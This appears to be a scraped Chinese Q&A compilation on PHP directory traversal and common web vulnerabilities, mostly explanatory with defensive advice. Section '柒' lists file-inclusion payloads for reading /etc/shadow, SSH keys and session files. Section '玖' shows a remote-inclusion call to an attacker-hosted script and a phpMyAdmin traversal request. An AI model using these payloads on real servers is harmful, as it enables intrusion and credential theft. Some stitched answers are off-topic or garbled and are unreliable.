php目录遍历漏洞

‘壹’ 什么是目录遍历攻击及如何防护

击人员通过目录便利攻击可以获取系统文件及服务器的配置文件等等。一般来说，他们利用服务器API、文件标准权限进行攻击。严格来说，目录遍历攻击并不是一种web漏洞，而是网站设计人员的设计“漏洞”。如果web设计者设计的web内容没有恰当的访问控制，允许http遍历，攻击者就可以访问受限的目录，并可以在web根目录以外执行命令。

攻击方法
攻击者通过访问根目录，发送一系列”../”字符来遍历高层目录，并且可以执行系统命令，甚至使系统崩溃。

发现漏洞
1、可以利用web漏洞扫描器扫描一下web应用，不仅可以找出漏洞，还会提供解决办法，另外还可以发现是否存在sql漏洞及其他漏洞。 2、也可以查看web log，如果发现有未授权用户访问越级目录，说明有目录便利漏洞。

如何防范
防范目录遍历攻击漏洞，最有效的办法就是权限控制，谨慎处理传向文件系统API的参数。本人认为最好的防范方法就是组合使用下面两条：

1、净化数据：对用户传过来的文件名参数进行硬编码或统一编码，对文件类型进行白名单控制，对包含恶意字符或者空字符的参数进行拒绝。

2、web应用程序可以使用chrooted环境包含被访问的web目录，或者使用绝对路径+参数来访问文件目录，时使其即使越权也在访问目录之内。www目录就是一个chroot应用。

chroot
chroot是在unix系统的一个操作，针对正在运作的软件进程和它的子进程，改变它外显的根目录。一个运行在这个环境下，经由chroot设置根目录的程序，它不能够对这个指定根目录之外的文件进行访问动作，不能读取，也不能更改它的内容。chroot这一特殊表达可能指chroot(2)系统调用或chroot(8)前端程序。

由chroot创造出的那个根目录，叫做“chroot监狱”（chroot jail，或chroot prison）。more chroot使用

‘贰’ 什么是目录遍历漏洞，什么是phpinfo消息泄露，最好是详细的通俗易懂的啊

目录遍历漏洞在国内外有许多不同的叫法,比如也可以叫做信息泄露漏洞,非授权文件包含漏洞.名称虽然多,可他们却有一个共同的成因,就是在程序中没有过滤用户输入的../和./之类的目录跳转符,导致恶意用户可以通过提交目录跳转来遍历服务器上的任意文件,其危害可想而知.

‘叁’ PHP漏洞有哪些

首先和ASP一样,对敏感字符过滤不严会导致注入..
还有PHP很有特点,他得运行程序是很人性化得,如果设置不好,随便提交个有错得地址之类就会告诉你绝对路径之类得敏感信息.
PHP包含过滤不严会导致读取任意文件.
变量过滤不严会导致伪造数据欺骗服务器.
等等等等好多..我说得这些都是比较常见和常用得

‘肆’ web漏洞攻击有哪些

一、SQL注入漏洞
SQL注入攻击（SQL Injection），简称注入攻击、SQL注入，被广泛用于非法获取网站控制权，是发生在应用程序的数据库层上的安全漏洞。在设计程序，忽略了对输入字符串中夹带的SQL指令的检查，被数据库误认为是正常的SQL指令而运行，从而使数据库受到攻击，可能导致数据被窃取、更改、删除，以及进一步导致网站被嵌入恶意代码、被植入后门程序等危害。
通常情况下，SQL注入的位置包括：
（1）表单提交，主要是POST请求，也包括GET请求；
（2）URL参数提交，主要为GET请求参数；
（3）Cookie参数提交；
（4）HTTP请求头部的一些可修改的值，比如Referer、User_Agent等；
（5）一些边缘的输入点，比如.mp3文件的一些文件信息等。
常见的防范方法
（1）所有的查询语句都使用数据库提供的参数化查询接口，参数化的语句使用参数而不是将用户输入变量嵌入到SQL语句中。当前几乎所有的数据库系统都提供了参数化SQL语句执行接口，使用此接口可以非常有效的防止SQL注入攻击。
（2）对进入数据库的特殊字符（’”<>&*;等）进行转义处理，或编码转换。
（3）确认每种数据的类型，比如数字型的数据就必须是数字，数据库中的存储字段必须对应为int型。
（4）数据长度应该严格规定，能在一定程度上防止比较长的SQL注入语句无法正确执行。
（5）网站每个数据层的编码统一，建议全部使用UTF-8编码，上下层编码不一致有可能导致一些过滤模型被绕过。
（6）严格限制网站用户的数据库的操作权限，给此用户提供仅仅能够满足其工作的权限，从而最大限度的减少注入攻击对数据库的危害。
（7）避免网站显示SQL错误信息，比如类型错误、字段不匹配等，防止攻击者利用这些错误信息进行一些判断。
（8）在网站发布之前建议使用一些专业的SQL注入检测工具进行检测，及时修补这些SQL注入漏洞。

二、跨站脚本漏洞
跨站脚本攻击（Cross-site scripting，通常简称为XSS）发生在客户端，可被用于进行窃取隐私、钓鱼欺骗、窃取密码、传播恶意代码等攻击。
XSS攻击使用到的技术主要为HTML和Javascript，也包括VBScript和ActionScript等。XSS攻击对WEB服务器虽无直接危害，但是它借助网站进行传播，使网站的使用用户受到攻击，导致网站用户帐号被窃取，从而对网站也产生了较严重的危害。
XSS类型包括：
（1）非持久型跨站：即反射型跨站脚本漏洞，是目前最普遍的跨站类型。跨站代码一般存在于链接中，请求这样的链接时，跨站代码经过服务端反射回来，这类跨站的代码不存储到服务端（比如数据库中）。上面章节所举的例子就是这类情况。
（2）持久型跨站：这是危害最直接的跨站类型，跨站代码存储于服务端（比如数据库中）。常见情况是某用户在论坛发贴，如果论坛没有过滤用户输入的Javascript代码数据，就会导致其他浏览此贴的用户的浏览器会执行发贴人所嵌入的Javascript代码。
（3）DOM跨站（DOM XSS）：是一种发生在客户端DOM（Document Object Model文档对象模型）中的跨站漏洞，很大原因是因为客户端脚本处理逻辑导致的安全问题。
常用的防止XSS技术包括：
（1）与SQL注入防护的建议一样，假定所有输入都是可疑的，必须对所有输入中的script、iframe等字样进行严格的检查。这里的输入不仅仅是用户可以直接交互的输入接口，也包括HTTP请求中的Cookie中的变量，HTTP请求头部中的变量等。
（2）不仅要验证数据的类型，还要验证其格式、长度、范围和内容。
（3）不要仅仅在客户端做数据的验证与过滤，关键的过滤步骤在服务端进行。
（4）对输出的数据也要检查，数据库里的值有可能会在一个大网站的多处都有输出，即使在输入做了编码等操作，在各处的输出点时也要进行安全检查。
（5）在发布应用程序之前测试所有已知的威胁。

三、弱口令漏洞
弱口令(weak password) 没有严格和准确的定义，通常认为容易被别人（他们有可能对你很了解）猜测到或被破解工具破解的口令均为弱口令。设置密码通常遵循以下原则：
（1）不使用空口令或系统缺省的口令，这些口令众所周之，为典型的弱口令。
（2）口令长度不小于8个字符。
（3）口令不应该为连续的某个字符（例如：AAAAAAAA）或重复某些字符的组合（例如：tzf.tzf.）。
（4）口令应该为以下四类字符的组合，大写字母(A-Z)、小写字母(a-z)、数字(0-9)和特殊字符。每类字符至少包含一个。如果某类字符只包含一个，那么该字符不应为首字符或尾字符。
（5）口令中不应包含本人、父母、子女和配偶的姓名和出生日期、纪念日期、登录名、E-mail地址等等与本人有关的信息，以及字典中的单词。
（6）口令不应该为用数字或符号代替某些字母的单词。
（7）口令应该易记且可以快速输入，防止他人从你身后很容易看到你的输入。
（8）至少90天内更换一次口令，防止未被发现的入侵者继续使用该口令。

四、HTTP报头追踪漏洞
HTTP/1.1（RFC2616）规范定义了HTTP TRACE方法，主要是用于客户端通过向Web服务器提交TRACE请求来进行测试或获得诊断信息。当Web服务器启用TRACE时，提交的请求头会在服务器响应的内容（Body）中完整的返回，其中HTTP头很可能包括Session Token、Cookies或其它认证信息。攻击者可以利用此漏洞来欺骗合法用户并得到他们的私人信息。该漏洞往往与其它方式配合来进行有效攻击，由于HTTP TRACE请求可以通过客户浏览器脚本发起（如XMLHttpRequest），并可以通过DOM接口来访问，因此很容易被攻击者利用。
防御HTTP报头追踪漏洞的方法通常禁用HTTP TRACE方法。

五、Struts2远程命令执行漏洞
ApacheStruts是一款建立Java web应用程序的开放源代码架构。Apache Struts存在一个输入过滤错误，如果遇到转换错误可被利用注入和执行任意Java代码。
网站存在远程代码执行漏洞的大部分原因是由于网站采用了Apache Struts Xwork作为网站应用框架，由于该软件存在远程代码执高危漏洞，导致网站面临安全风险。CNVD处置过诸多此类漏洞，例如：“GPS车载卫星定位系统”网站存在远程命令执行漏洞(CNVD-2012-13934)；Aspcms留言本远程代码执行漏洞（CNVD-2012-11590）等。
修复此类漏洞，只需到Apache官网升级Apache Struts到最新版本：http://struts.apache.org

六、文件上传漏洞
文件上传漏洞通常由于网页代码中的文件上传路径变量过滤不严造成的，如果文件上传功能实现代码没有严格限制用户上传的文件后缀以及文件类型，攻击者可通过 Web 访问的目录上传任意文件，包括网站后门文件（webshell），进而远程控制网站服务器。
因此，在开发网站及应用程序过程中，需严格限制和校验上传的文件，禁止上传恶意代码的文件。同时限制相关目录的执行权限，防范webshell攻击。

七、私有IP地址泄露漏洞
IP地址是网络用户的重要标示，是攻击者进行攻击前需要了解的。获取的方法较多，攻击者也会因不同的网络情况采取不同的方法，如：在局域网内使用Ping指令，Ping对方在网络中的名称而获得IP；在Internet上使用IP版的QQ直接显示。最有效的办法是截获并分析对方的网络数据包。攻击者可以找到并直接通过软件解析截获后的数据包的IP包头信息，再根据这些信息了解具体的IP。
针对最有效的“数据包分析方法”而言，就可以安装能够自动去掉发送数据包包头IP信息的一些软件。不过使用这些软件有些缺点，譬如：耗费资源严重，降低计算机性能；访问一些论坛或者网站时会受影响；不适合网吧用户使用等等。现在的个人用户采用最普及隐藏IP的方法应该是使用代理，由于使用代理服务器后，“转址服务”会对发送出去的数据包有所修改，致使“数据包分析”的方法失效。一些容易泄漏用户IP的网络软件(QQ、MSN、IE等)都支持使用代理方式连接Internet，特别是QQ使用“ezProxy”等代理软件连接后，IP版的QQ都无法显示该IP地址。虽然代理可以有效地隐藏用户IP，但攻击者亦可以绕过代理，查找到对方的真实IP地址，用户在何种情况下使用何种方法隐藏IP，也要因情况而论。

八、未加密登录请求
由于Web配置不安全，登陆请求把诸如用户名和密码等敏感字段未加密进行传输，攻击者可以窃听网络以劫获这些敏感信息。建议进行例如SSH等的加密后再传输。

九、敏感信息泄露漏洞
SQL注入、XSS、目录遍历、弱口令等均可导致敏感信息泄露，攻击者可以通过漏洞获得敏感信息。针对不同成因，防御方式不同

十、CSRF
http://www.cnblogs.com/hyddd/archive/2009/04/09/1432744.html

Web应用是指采用B/S架构、通过HTTP/HTTPS协议提供服务的统称。随着互联网的广泛使用，Web应用已经融入到日常生活中的各个方面：网上购物、网络银行应用、证券股票交易、政府行政审批等等。在这些Web访问中，大多数应用不是静态的网页浏览，而是涉及到服务器侧的动态处理。此时，如果Java、PHP、ASP等程序语言的编程人员的安全意识不足，对程序参数输入等检查不严格等，会导致Web应用安全问题层出不穷。

本文根据当前Web应用的安全情况，列举了Web应用程序常见的攻击原理及危害，并给出如何避免遭受Web攻击的建议。

Web应用漏洞原理
Web应用攻击是攻击者通过浏览器或攻击工具，在URL或者其它输入区域（如表单等），向Web服务器发送特殊请求，从中发现Web应用程序存在的漏洞，从而进一步操纵和控制网站，查看、修改未授权的信息。

1.1 Web应用的漏洞分类
1、信息泄露漏洞

信息泄露漏洞是由于Web服务器或应用程序没有正确处理一些特殊请求，泄露Web服务器的一些敏感信息，如用户名、密码、源代码、服务器信息、配置信息等。

造成信息泄露主要有以下三种原因：

–Web服务器配置存在问题，导致一些系统文件或者配置文件暴露在互联网中；

–Web服务器本身存在漏洞，在浏览器中输入一些特殊的字符，可以访问未授权的文件或者动态脚本文件源码；

–Web网站的程序编写存在问题，对用户提交请求没有进行适当的过滤，直接使用用户提交上来的数据。

2、目录遍历漏洞

目录遍历漏洞是攻击者向Web服务器发送请求，通过在URL中或在有特殊意义的目录中附加“../”、或者附加“../”的一些变形（如“..\”或“..//”甚至其编码），导致攻击者能够访问未授权的目录，以及在Web服务器的根目录以外执行命令。

3、命令执行漏洞

命令执行漏洞是通过URL发起请求，在Web服务器端执行未授权的命令，获取系统信息，篡改系统配置，控制整个系统，使系统瘫痪等。

命令执行漏洞主要有两种情况：

–通过目录遍历漏洞，访问系统文件夹，执行指定的系统命令；

–攻击者提交特殊的字符或者命令，Web程序没有进行检测或者绕过Web应用程序过滤，把用户提交的请求作为指令进行解析，导致执行任意命令。

4、文件包含漏洞

文件包含漏洞是由攻击者向Web服务器发送请求时，在URL添加非法参数，Web服务器端程序变量过滤不严，把非法的文件名作为参数处理。这些非法的文件名可以是服务器本地的某个文件，也可以是远端的某个恶意文件。由于这种漏洞是由PHP变量过滤不严导致的，所以只有基于PHP开发的Web应用程序才有可能存在文件包含漏洞。

5、SQL注入漏洞

SQL注入漏洞是由于Web应用程序没有对用户输入数据的合法性进行判断，攻击者通过Web页面的输入区域(如URL、表单等) ，用精心构造的SQL语句插入特殊字符和指令，通过和数据库交互获得私密信息或者篡改数据库信息。SQL注入攻击在Web攻击中非常流行，攻击者可以利用SQL注入漏洞获得管理员权限，在网页上加挂木马和各种恶意程序，盗取企业和用户敏感信息。

6、跨站脚本漏洞

跨站脚本漏洞是因为Web应用程序时没有对用户提交的语句和变量进行过滤或限制，攻击者通过Web页面的输入区域向数据库或HTML页面中提交恶意代码，当用户打开有恶意代码的链接或页面时，恶意代码通过浏览器自动执行，从而达到攻击的目的。跨站脚本漏洞危害很大，尤其是目前被广泛使用的网络银行，通过跨站脚本漏洞攻击者可以冒充受害者访问用户重要账户，盗窃企业重要信息。

根据前期各个漏洞研究机构的调查显示，SQL注入漏洞和跨站脚本漏洞的普遍程度排名前两位，造成的危害也更加巨大。

1.2 SQL注入攻击原理
SQL注入攻击是通过构造巧妙的SQL语句，同网页提交的内容结合起来进行注入攻击。比较常用的手段有使用注释符号、恒等式（如1＝1）、使用union语句进行联合查询、使用insert或update语句插入或修改数据等，此外还可以利用一些内置函数辅助攻击。

通过SQL注入漏洞攻击网站的步骤一般如下：

第一步：探测网站是否存在SQL注入漏洞。

第二步：探测后台数据库的类型。

第三步：根据后台数据库的类型，探测系统表的信息。

第四步：探测存在的表信息。

第五步：探测表中存在的列信息。

第六步：探测表中的数据信息。

1.3 跨站脚本攻击原理
跨站脚本攻击的目的是盗走客户端敏感信息,冒充受害者访问用户的重要账户。跨站脚本攻击主要有以下三种形式：

1、本地跨站脚本攻击

B给A发送一个恶意构造的Web URL，A点击查看了这个URL，并将该页面保存到本地硬盘（或B构造的网页中存在这样的功能）。A在本地运行该网页，网页中嵌入的恶意脚本可以A电脑上执行A持有的权限下的所有命令。

2、反射跨站脚本攻击

A经常浏览某个网站，此网站为B所拥有。A使用用户名/密码登录B网站，B网站存储下A的敏感信息（如银行帐户信息等）。C发现B的站点包含反射跨站脚本漏洞，编写一个利用漏洞的URL，域名为B网站，在URL后面嵌入了恶意脚本（如获取A的cookie文件），并通过邮件或社会工程学等方式欺骗A访问存在恶意的URL。当A使用C提供的URL访问B网站时，由于B网站存在反射跨站脚本漏洞，嵌入到URL中的恶意脚本通过Web服务器返回给A，并在A浏览器中执行，A的敏感信息在完全不知情的情况下将发送给了C。

3、持久跨站脚本攻击

B拥有一个Web站点，该站点允许用户发布和浏览已发布的信息。C注意到B的站点具有持久跨站脚本漏洞，C发布一个热点信息，吸引用户阅读。A一旦浏览该信息，其会话cookies或者其它信息将被C盗走。持久性跨站脚本攻击一般出现在论坛、留言簿等网页，攻击者通过留言，将攻击数据写入服务器数据库中，浏览该留言的用户的信息都会被泄漏。

Web应用漏洞的防御实现
对于以上常见的Web应用漏洞漏洞，可以从如下几个方面入手进行防御：

1)对 Web应用开发者而言

大部分Web应用常见漏洞，都是在Web应用开发中，开发者没有对用户输入的参数进行检测或者检测不严格造成的。所以，Web应用开发者应该树立很强的安全意识，开发中编写安全代码；对用户提交的URL、查询关键字、HTTP头、POST数据等进行严格的检测和限制，只接受一定长度范围内、采用适当格式及编码的字符，阻塞、过滤或者忽略其它的任何字符。通过编写安全的Web应用代码，可以消除绝大部分的Web应用安全问题。

2) 对Web网站管理员而言

作为负责网站日常维护管理工作Web管理员，应该及时跟踪并安装最新的、支撑Web网站运行的各种软件的安全补丁，确保攻击者无法通过软件漏洞对网站进行攻击。

除了软件本身的漏洞外，Web服务器、数据库等不正确的配置也可能导致Web应用安全问题。Web网站管理员应该对网站各种软件配置进行仔细检测，降低安全问题的出现可能。

此外，Web管理员还应该定期审计Web服务器日志，检测是否存在异常访问，及早发现潜在的安全问题。

3）使用网络防攻击设备

前两种为事前预防方式，是比较理想化的情况。然而在现实中，Web应用系统的漏洞还是不可避免的存在：部分Web网站已经存在大量的安全漏洞，而Web开发者和网站管理员并没有意识到或发现这些安全漏洞。由于Web应用是采用HTTP协议，普通的防火墙设备无法对Web类攻击进行防御，因此可以使用IPS入侵防御设备来实现安全防护。

H3C IPS Web攻击防御

H3C IPS入侵防御设备有一套完整的Web攻击防御框架，能够及时发现各种已经暴露的和潜在的Web攻击。下图为对于Web攻击的总体防御框架。

图1：Web攻击防御框架，参见：http://blog.csdn.net/moshenglv/article/details/53439579

H3C IPS采用基于特征识别的方式识别并阻断各种攻击。IPS设备有一个完整的特征库，并可定期以手工与自动的方式对特征库进行升级。当网络流量进入IPS后，IPS首先对报文进行预处理，检测报文是否正确，即满足协议定义要求，没有错误字段；如果报文正确，则进入深度检测引擎。该引擎是IPS检测的核心模块，对通过IPS设备的Web流量进行深层次的分析，并与IPS攻击库中的特征进行匹配，检测Web流量是否存在异常；如果发现流量匹配了攻击特征，IPS则阻断网络流量并上报日志；否则，网络流量顺利通过。

此Web攻击防御框架有如下几个特点：

1) 构造完整的Web攻击检测模型，准确识别各种Web攻击

针对Web攻击的特点，考虑到各种Web攻击的原理和形态，在不同漏洞模型之上开发出通用的、层次化的Web攻击检测模型，并融合到特征库中。这些模型抽象出Web攻击的一般形态，对主流的攻击能够准确识别，使得模型通用化。

2) 检测方式灵活，可以准确识别变形的Web攻击

在实际攻击中，攻击者为了逃避防攻击设备的检测，经常对Web攻击进行变形，如采用URL编码技术、修改参数等。H3C根据Web应用漏洞发生的原理、攻击方式和攻击目标，对攻击特征进行了扩展。即使攻击者修改攻击参数、格式、语句等内容，相同漏洞原理下各种变形的攻击同样能够被有效阻断。这使得IPS的防御范围扩大，防御的灵活性也显着增强，极大的减少了漏报情况的出现。

3) 确保对最新漏洞及技术的跟踪，有效阻止最新的攻击

随着Web攻击出现的频率日益增高，其危害有逐步扩展的趋势。这对IPS设备在防御的深度和广度上提出了更高的要求，不仅要能够防御已有的Web攻击，更要有效的阻止最新出现的、未公布的攻击。目前，H3C已经建立起一套完整的攻防试验环境，可以及时发现潜在Web安全漏洞。同时还在继续跟踪最新的Web攻击技术和工具，及时更新Web攻击的特征库，第一时间发布最新的Web漏洞应对措施，确保用户的网络不受到攻击。

4) 保证正常业务的高效运行

检测引擎是IPS整个设备运行的关键，该引擎使用了高效、准确的检测算法，对通过设备的流量进行深层次的分析，并通过和攻击特征进行匹配，检测流量是否存在异常。如果流量没有匹配到攻击特征，则允许流量通过，不会妨碍正常的网络业务，在准确防御的同时保证了正常业务的高效运行。

结束语

互联网和Web技术广泛使用，使Web应用安全所面临的挑战日益严峻，Web系统时时刻刻都在遭受各种攻击的威胁，在这种情况下，需要制定一个完整的Web攻击防御解决方案，通过安全的Web应用程序、Web服务器软件、Web防攻击设备共同配合，确保整个网站的安全。任何一个简单的漏洞、疏忽都会造成整个网站受到攻击，造成巨大损失。此外 ，Web攻击防御是一个长期持续的工作，随着Web技术的发展和更新，Web攻击手段也不断发展，针对这些最新的安全威胁，需要及时调整Web安全防护策略，确保Web攻击防御的主动性，使Web网站在一个安全的环境中为企业和客户服务。

原文链接：

‘伍’ 请教大家如何解决网站SQL注入漏洞,目录遍历漏洞谢谢!

我知道目录遍历漏洞如何解决了,就是我服务器的IIS设置里,主目录里,把目录浏览前面的勾去掉即可.谢谢大家,不过我的SQL注入漏洞还没解决呢!我找到一个软件,NBSI3.0,测试了我的网站,用get方式检测,还是可以猜出表名和列名,但是用post方式检测就没有了,所以正在研究如何让get
方式检测也可以没有漏洞,有知道怎么弄的专家,高手请指教!谢谢!

‘陆’ php漏洞与代码审计过程中需要注意的几点

1.xss + sql注入
其中占大头的自然是XSS与SQL注入，对于框架类型或者有公共文件的，建议在公共文件中统一做一次XSS和SQL注入的过滤。写个过滤函数，可由如下所示：
$_REQUEST = filter_xss（$_REQUEST）；
$_GET = filter_xss（$_GET）；
$_POST = filter_xss（$_POST）；
$_COOKIE = filter_xss（$_COOKIE）；
$_POST = filter_sql（$_POST）；
$_GET = filter_sql（$_GET）；
$_COOKIE = filter_sql（$_COOKIE）；
$_REQUEST = filter_sql（$_REQUEST）；
这里有一点需要说明，$_REQUEST虽然等于$_GET+$_POST,但他们是独立的数组，也就是说假设改变了$_GET的值，但$_REQUEST的值还是原来的值，所以过滤时都不能落下，至于其他的如$_FILE之类的就可忽略了。
最简单的filter_xss函数是htmlspecialchars（）
最简单的filter_sql函数是mysql_real_escape_string（）
当然，谁都知道这种过滤filter_sql只能过滤字符型和搜索型的注入，对于数字型是没有办法的，但也说明做了这层过滤后，只需在后面注意数字型的SQL语句就可以了，遇到了加intval过滤就可以了，这就变得容易多了。
2. 命令执行
对于命令执行，可以从关键字入手，总共可分为3类
（1） php代码执行 :eval等
（2）shell命令执行：exec、passthru、system、shell_exec等
（3） 文件处理：fwrite、fopen、mkdir等
对于这几类需要注意其参数是否用户可控。
3.上传漏洞
对于上传漏洞，也是重点关注的地方，要仔细分析它的处理流程，针对上传的绕过方式是很多的，最保险的方式：在保存文件是采用文件名随机命名和后缀白名单方式。其次要注意的一点是上传文件的地方可能不止一处，不要有遗漏，可能会碰到这样的情况，突然在某个目录里面包含了一个第三方的编辑器在里面。
文件包含漏洞涉及的函数如include（） 、include_once（）、require（）、require_once（）、file_get_contents（）等
最常见的还是出在下载文件功能函数，例如download.php?file=///etc/passwd 这种类型中。
4. 权限绕过
权限绕过可分为两类吧
（1）后台文件的未授权访问。后台的文件没有包含对session的验证，就容易出现这样的问题
（2）未作用户隔离，例如mail.php?id=23显示了你的信件，那么换个ID, mail.php?id=24就查看到了别人的信件，编写代码是方便，把信件都存在一个数据表里，id统一编号，前端展现时只需按id取出即可，但未作用户隔离，判定归属，容易造成越权访问。
这样的例子是很常见的，给某银行做评估是就经常发现这种漏洞。
5. 信息泄露
信息泄露算是比较低危的漏洞了，比如列目录这种就属于部署问题，而与代码审计无关了，而像暴路径、暴源码这种是需要防止的。曾经遇到这样的代码
<?php if（empty（$_GET['a']）） {…} ?>
表面上似乎没问题，可是当请求变为 xx.php?a[]=1时，即参数变为数组的时候，就会发生错误以致路径泄露，而用isset判断则不会，当然一个个防太麻烦，建议在配置文件中关闭错误提示，或者在公共文件中加入如下代码以关闭错误显示功能：
<?php error_reporting（0）；?>

‘柒’ php文件包含漏洞可能造成的危害有哪些

在接下来的内容中会以代码样本作为例子，来给大家介绍各种奇葩猥琐的利用姿势。
0x01 普通本地文件包含

1

<?php
include("inc/"

. $_GET['file']);
?>

包含同目录下的文件：
?file=.htaccess
目录遍历：
?file=../../../../../../../../../var/lib/locate.db ?file=../../../../../../../../../var/lib/mlocate/mlocate.db
（Linux中这两个文件储存着所有文件的路径，需要root权限）
包含错误日志： ?file=../../../../../../../../../var/log/apache/error.log （试试把UA设置为“”来使payload进入日志）
获取web目录或者其他配置文件：
?file=../../../../../../../../../usr/local/apache2/conf/httpd.conf
（更多→http://wiki.apache.org/httpd/DistrosDefaultLayout）
包含上传的附件：
?file=../attachment/media/xxx.file
读取session文件：
?file=../../../../../../tmp/sess_tnrdo9ub2tsrntv0pdir1no7
（session文件一般在/tmp目录下，格式为sess_[your phpsessid value]，有时候也有可能在/var/lib/php5之类的，在此之前建议先读取配置文件。在某些特定的情况下如果你能够控制session的值，也许你能够获得一个shell）
如果拥有root权限还可以试试读这些东西：
/root/.ssh/authorized_keys
/root/.ssh/id_rsa
/root/.ssh/id_rsa.keystore
/root/.ssh/id_rsa.pub
/root/.ssh/known_hosts
/etc/shadow
/root/.bash_history
/root/.mysql_history
/proc/self/fd/fd[0-9]* (文件标识符)
/proc/mounts
/proc/config.gz
如果有phpinfo可以包含临时文件：
参见http://hi..com/mmnwzsdvpkjovwr/item/3f7ceb39965145eea984284el

‘捌’ 目录遍历攻击可以直接带来哪些危害

受益来说比较复杂，有一些小型ddos攻击者，只是为了虚荣心，基本没有什么利益但是有组织，有目的的ddos攻击，是有复杂的利益链，一般都会有上家付钱给攻击者。对于被害者来说，危害就是网站，设置网站所在服务器不能正常工作，网站瘫痪。损害很大。

(8)php目录遍历漏洞扩展阅读

目录遍历攻击

一、描述

攻击人员通过目录便利攻击可以获取系统文件及服务器的配置文件等等。一般来说，他们利用服务器API、文件标准权限进行攻击。严格来说，目录遍历攻击并不是一种web漏洞，而是网站设计人员的设计“漏洞”。

如果web设计者设计的web内容没有恰当的访问控制，允许http遍历，攻击者就可以访问受限的目录，并可以在web根目录以外执行命令。

二、攻击方法

攻击者通过访问根目录，发送一系列”．．／”字符来遍历高层目录，并且可以执行系统命令，甚至使系统崩溃。

三、发现漏洞

1、可以利用web漏洞扫描器扫描一下web应用，不仅可以找出漏洞，还会提供解决办法，另外还可以发现是否存在sql漏洞及其他漏洞。

2、也可以查看weblog，如果发现有未授权用户访问越级目录，说明有目录便利漏洞。

四、如何防范

防范目录遍历攻击漏洞，最有效的办法就是权限控制，谨慎处理传向文件系统API的参数。本人认为最好的防范方法就是组合使用下面两条：

1、净化数据：对用户传过来的文件名参数进行硬编码或统一编码，对文件类型进行白名单控制，对包含恶意字符或者空字符的参数进行拒绝。

2、web应用程序可以使用chrooted环境包含被访问的web目录，或者使用绝对路径＋参数来访问文件目录，时使其即使越权也在访问目录之内。www目录就是一个chroot应用。

‘玖’ php源码漏洞多少钱

从现在的网络安全来看,大家最关注和接触最多的WEB页面漏洞应该是ASP了,在这方面,小竹是专家,我没发言权.然而在PHP方面来看,也同样存在
很严重的安全问题,但是这方面的文章却不多.在这里,就跟大家来稍微的讨论一下PHP页面的相关漏洞吧.
我对目前常见的PHP漏洞做了一下总结,大致分为以下几种包含文件漏洞,脚本命令执行漏洞,文件泄露漏洞,SQL注入漏洞等几种.当然,至于
COOKIE欺骗等一部分通用的技术就不在这里讨论了,这些资料网上也很多.那么,我们就一个一个来分析一下怎样利用这些漏洞吧!
首先,我们来讨论包含文件漏洞.这个漏洞应该说是PHP独有的吧.这是由于不充分处理外部提供的恶意数据,从而导致远程攻击者可以利用这
些漏洞以WEB进程权限在系统上执行任意命令.我们来看一个例子假设在a.php中有这样一句代码
php
include($include.***.php);
在这段代码中,$include一般是一个已经设置好的路径,但是我们可以通过自己构造一个路径来达到攻击的目的.比方说我们提交
a.phpinclude=httpwebb.php,这个web是我们用做攻击的空间,当然,b.php也就是我们用来攻击的代码了.我们可以在b.php中写入类似于
passthru(binls etc);的代码.这样,就可以执行一些有目的的攻击了.(注web服务器应该不能执行php代码,不然就出问题了.相关详情可以去看
如何对PHP程序中的常见漏洞进行攻击).在这个漏洞方面,出状况的很多,比方说PayPal Store Front,
HotNews,Mambo Open Source,PhpDig,YABB SE,phpBB,InvisionBoard,SOLMETRA SPAW Editor,Les Visiteurs,PhpGedView,X-Cart等等一些.
接着,我们再来看一下脚本命令执行漏洞.这是由于对用户提交的URI参数缺少充分过滤，提交包含恶意HTML代码的数据，可导致触发跨站脚
本攻击，可能获得目标用户的敏感信息。我们也举个例子在PHP Transparent的PHP PHP 4.3.1以下版本中的index.php页面对PHPSESSID缺少充
分的过滤,我们可以通过这样的代码来达到攻击的目的
httpwebindex.phpPHPSESSID=script...script在script里面我们可以构造函数来获得用户的一些敏感信息.在这个漏洞方面相对要少一点,除了
PHP Transparent之外还有PHP-Nuke,phpBB,PHP Classifieds,PHPix,Ultimate PHP Board等等.
再然后,我们就来看看文件泄露漏洞了.这种漏洞是由于对用户提交参数缺少充分过滤，远程攻击者可以利用它进行目录遍历攻击以及获取
一些敏感信息。我们拿最近发现的phpMyAdmin来做例子.在phpMyAdmin中,export.php页面没有对用户提交的'what'参数进行充分过滤,远程攻击
者提交包含多个'..'字符的数据，便可绕过WEB ROOT限制，以WEB权限查看系统上的任意文件信息。比方说打入这样一个地址
export.phpwhat=............etcpasswd%00 就可以达到文件泄露的目的了.在这方面相对多一点,有myPHPNuke,McNews等等.
最后,我们又要回到最兴奋的地方了.想想我们平时在asp页面中用SQL注入有多么爽,以前还要手动注入,一直到小竹悟出SQL注入密笈(嘿
嘿),然后再开做出NBSI以后,我们NB联盟真是拉出一片天空.曾先后帮CSDN,大富翁论坛,中国频道等大型网站找出漏洞.(这些废话不多说了,有点
跑题了...).还是言规正传,其实在asp中SQL的注入和php中的SQL注入大致相同,只不过稍微注意一下用的几个函数就好了.将asc改成ASCII,len
改成LENGTH,其他函数基本不变了.其实大家看到PHP的SQL注入,是不是都会想到PHP-NUKE和PHPBB呢不错,俗话说树大招分,像动网这样的论坛在
asp界就该是漏洞这王了,这并不是说它的论坛安全太差,而是名气太响,别人用的多了,研究的人也就多了,发现的安全漏洞也就越多了.PHPBB也
是一样的,现在很大一部分人用PHP做论坛的话,一般都是选择了PHPBB.它的漏洞也是一直在出,从最早phpBB.com phpBB 1.4.0版本被人发现漏洞
,到现在最近的phpBB 2.0.6版本的groupcp.php,以及之前发现的search.php,profile.php,viewtopic.php等等加起来,大概也有十来个样子吧.
这也一直导致,一部分人在研究php漏洞的时候都会拿它做实验品,所谓百练成精嘛,相信以后的PHPBB会越来越好.
好了,我们还是来分析一下漏洞产生的原因吧.拿viewtopic.php页面来说,由于在调用viewtopic.php时，直接从GET请求中获得topic_id并
传递给SQL查询命令,而并没有进行一些过滤的处理,攻击者可以提交特殊的SQL字符串用于获得MD5密码，获得此密码信息可以用于自动登录或者
进行暴力破解。(我想应该不会有人想去暴力破解吧,除非有特别重要的原因).先看一下相关源代码
# if ( isset($HTTP_GET_VARS[POST_TOPIC_URL]) )
# {
# $topic_id = intval($HTTP_GET_VARS[POST_TOPIC_URL]);
# }
# else if ( isset($HTTP_GET_VARS['topic']) )
# {
# $topic_id = intval($HTTP_GET_VARS['topic']);
# }
从上面我们可以看出,如果提交的view=newest并且sid设置了值的话,执行的查询代码像下面的这个样子(如果你还没看过PHPBB源代码的话,建议
你看了再对着这里来看,受影响系统为phpBB 2.0.5和phpBB 2.0.4).
# $sql = SELECT p.post_id
# FROM . POSTS_TABLE . p, . SESSIONS_TABLE . s, . USERS_TABLE . u
